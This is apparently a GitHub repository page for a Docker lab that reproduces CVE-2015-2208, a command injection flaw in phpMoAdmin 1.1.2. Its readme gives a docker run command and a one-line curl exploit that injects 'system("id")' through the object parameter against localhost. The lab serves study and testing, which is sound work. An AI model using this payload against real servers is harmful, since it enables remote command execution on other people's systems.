Skip to content

ptantiku/cve-2015-2208

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
phpmoadmin1.1.2.zip
phpmoadmin1.1.2.zip
 
 
readme.md
readme.md
 
 
run.sh
run.sh
 
 

Repository files navigation

#Dockerfile to simulate environment for CVE-2015-2208#

The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter.

Discovered by: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

References:

##Test environment##

sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'

About

Docker simulating cve-2015-2208 vulnerability

Resources

Readme

License

GPL-2.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages